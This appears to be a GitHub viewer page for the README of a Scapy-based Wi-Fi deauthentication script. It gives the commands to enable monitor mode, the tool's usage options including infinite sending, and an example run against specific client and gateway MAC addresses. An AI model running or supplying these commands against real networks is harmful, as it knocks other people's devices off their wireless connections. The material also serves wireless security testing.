| FazBrowse GitHub Viewer | Trending | | Home |
| Tools: [Download Repo ZIP] [Original HTTPS Page] |
| Name | Name | Last commit date | ||
|---|---|---|---|---|
parent directory.. | ||||
to run this:
airmon-ng start wlan0
python3 scapy_deauth.py --help
usage: scapy_deauth.py [-h] [-c COUNT] [--interval INTERVAL] [-i IFACE] [-v]
target gateway
A python script for sending deauthentication frames
positional arguments:
target Target MAC address to deauthenticate.
gateway Gateway MAC address that target is authenticated with
optional arguments:
-h, --help show this help message and exit
-c COUNT, --count COUNT
number of deauthentication frames to send, specify 0
to keep sending infinitely, default is 0
--interval INTERVAL The sending frequency between two frames sent, default
is 100ms
-i IFACE Interface to use, must be in monitor mode, default is
'wlan0mon'
-v, --verbose wether to print messages
python3 scapy_deauth.py 00:ae:fa:81:e2:5e e8:94:f6:c4:97:3f -i wlan0mon -v
| Back | FazBrowse Home | New Git URL |